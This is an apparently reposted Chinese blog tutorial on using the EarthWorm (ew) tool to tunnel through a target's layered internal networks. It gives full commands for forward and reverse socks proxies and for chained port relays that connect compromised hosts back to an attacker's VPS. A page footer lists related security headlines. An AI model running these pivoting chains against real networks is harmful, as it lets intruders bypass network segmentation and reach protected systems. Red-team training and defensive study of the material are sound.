利用 ew 轻松穿透目标多级内网
0x01 ew 快速穿透目标多级内网 :
简要环境说明 :
win2008R2 假设为目标边界 web 服务器 , 可正常访问公网假设其公网 ip 为 192.168.3.23 假设其内网 ip 为 192.168.32.131
win2008 假设为目标内网数据库服务器 , 可正常访问公网假设其内网 ip 为 192.168.32.170
win7 假设为自己公网的 vps 假设其公网 ip 为 192.168.3.232
centos 5.1 假设为目标内网的一台 linux 机器 , 没有 dns 不能访问公网假设其内网 ip 为 192.168.32.169
0x02 首先 , 利用 ew 做最简单的正向代理 , 其实就是大家最常用的所谓的 ss: 在 win2008R2 机器上执行

ew_for_Win.exe -s ssocksd -l 1080

在 win7 上打开 Proxifier 根据上面监听的端口建立正常的 socks 代理即可

0x03 假设目标机器就直接处在内网 [没有公网 ip, 但可以访问公网], 我们也可以利用 ew 进行反向 socks5 代理 , 然后直接在 vps 上就可以很方便的访问目标内网中的所有机器了 :
先在 win7 上执行 , 等待目标反弹连接

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

在 win2008 上执行 , 反弹 socks5 连接 # ew_for_Win.exe -s rssocks -d 192.168.3.232 -e 1234
0x04 实现复杂内网环境下的跨网段多级穿透 :
第一种场景 , 内网机器不能访问公网 , 可通过能访问公网的机器把内网不能访问公网机器带出来 , 比较简单 , 如下 :
假设 win2008 处在目标内网且不能访问公网但可以访问内网中的资源
而 win2008R2 这台机器上虽然有内网 ip, 但不能访问内网资源 , 好在 win2008R2 可以访问 win2008
这时我们想获取内网资源就可以这样干 , 先在 win2008 上开启 socks 代理服务 , 然后再在 DMZ 的 win2008R2 连上内网的 win2008 的 socks 服务
最后 , 通过 win2008 上的 socks 服务我们就可以轻松访问目标内网中的各种资源了 , 具体实现过程如下
首先 , 在 win2008 上执行 , 意思就是在本地建立 socks5 代理 , 端口为 1080

ew_for_Win.exe -s ssocksd -l 1080

在到 DMZ 的 win2008R2 上执行 , 意思就是把来自外部的 1090 端口的流量转到内网 192.168.32.170 这台机器的 1080 端口上

ew_for_Win.exe -s lcx_tran -l 1090 -f 192.168.32.170 -g 1080

最后 , 再回到 win7[vps] 上去利用 Proxifier 建立正常的 socks 代理访问 1090 端口即可 , 访问 vps 的 1090 就相当于访问内网 win2008 的 1080 端口
第二种场景 , 还是有些机器不能访问公网的情况 :
假设 win2008 在内网且能访问公网但不能访问内网资源 , 而 centos 5.1 能访问内网资源但却无法访问公网 , 而 win2008 可以访问 centos 5.1
这试 , 我们要想获取内网资源 , 就可以通过 win2008 在 centos 5.1 和 win7[vps] 之间建立一条 socks5 通道 , 实现过程比较简单 , 如下
首先 , 在 win7[实际中的 vps] 上执行 , 把来自外部的 1080 端口的流量转到本地的 1379 端口上

ew_for_Win.exe -s lcx_listen -l 1080 -e 1379

此时回到 centos 5.1 上执行 , 在本地启动 socks5 代理并监听 2345 端口

chmod +x ew_for_Linux32

./ew_for_Linux32 -s ssocksd -l 2345

然后再到 win2008 上去执行 , 意思就是把 win7[vps] 的 1379 端口和 centos 5.1 的 2345 进行绑定 , 即建立 socks5 通道

ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1379 -f 192.168.32.169 -g 2345

最后 , 在回到 win7[vps] 建立正常的 socks 代理访问即可 , 实际上就相当于访问 win7 的 1080 就相当于访问 centos 5.1 的 2345 端口 , 通过这种方式一样也可以把整个目标内网代理出来
第三种场景 , 多级内网轻松穿透 :
假设 win2008R2 在内网 [无公网 ip] 并在一个独立的内网段 ,win2008 也处在目标内网 , 假设在另一个内网段 ,centos 5.1 同样也处在内网 , 可又在另一个单独的内网段
且 win2008R2 能访问 win2008,win2008 能访问 centos 5.1, 而 centos 5.1 能访问目标核心网 , 要实现层层穿透 , 访问到核心网资源 , 我们就可以这样
先在 win7[vps] 上执行 , 把来自外部的 1080 端口流量转到本地的 1235 端口上

ew_for_Win.exe -s rcsocks -l 1080 -e 1235

在 win2008R2 上执行 , 把 win7[vps] 的 1235 端口和内网 win2008 的 3456 端口绑定

ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1235 -f 192.168.32.170 -g 3456

在 win2008 上执行 , 将来自外部的 1236 端口和本地的 3456 端口进行绑定

ew_for_Win.exe -s lcx_listen -l 3456 -e 1236

在 centos 5.1 上执行 , 将本地的 socks 连接反弹到 win2008 的 1236 端口上 , 此时再回到 win2008 上看会提示”rssocks cmd_socket OK!”, 说明通道已经建立成功

./ew_for_Linux32 -s rssocks -d 192.168.32.170 -e 1236

最后 , 再回到 win7[vps] 上利用 Proxifier 访问本地的 1080 就相当于访问 centos 5.1 的 1236 端口 , 即可轻松获取核心网的数据
一点小结 :
关于 ew, 想必经常搞内网的朋友 , 都已经非常熟练了 , 这里也就不废话了 , 其实 , 关于 ew 本身在实战中还是比较实用的 , 在此也非常感谢作者的无私贡献 , 真心希望国内能多一些这样的人 , 总体来讲 , 在工具使用上并没有太多技术含量 , 关键还是要你自己根据目标的实际内网环境仔细弄清楚数据流向再针对性的用 , 上面一些简单应用场景中 , 表面看着貌似挺复杂的 , 其实真正理解以后 , 都非常简单 , 深刻搞清楚这些最基本的东西你才有可能灵活应用 , 什么都是如此 , 总是停留在’用’别人的工具上 , 自己没有一点儿的独立分析和想法 , 是很难有长进的 , 后续有空会再简单介绍下关于 Termite 跳板机使用
文章来源:klion's blog_https://klionsec.github.io/2017/08/05/ew-tunnel/_
猜你喜欢这是赤裸裸打网络安全从业者的脸!昨晚停网后,我写了一段代码破解了隔壁小姐姐的 wifi 密码 ...有黑客正在通过骨干网络发动中间人攻击 国内多个省市区均受攻击影响怎样从零学起成为一名黑客?
安装输入法后用户主页被篡改,男子“种木马”牟利被判刑
数以万计的私人 Zoom 录像被无意上传到视频云 供任何人在线观看
支付宝账户需要重新实名认证?小心被钓鱼!
黑客入侵 Elasticsearch,破坏了超 1.5 万台服务器
境外 APT 组织利用深信服 VPN 漏洞入侵事件通告

利用 ew 轻松穿透目标多级内网

利用 ew 轻松穿透目标多级内网你点的每个赞,我都认真当成了喜欢

来源链接:mp.weixin.qq.com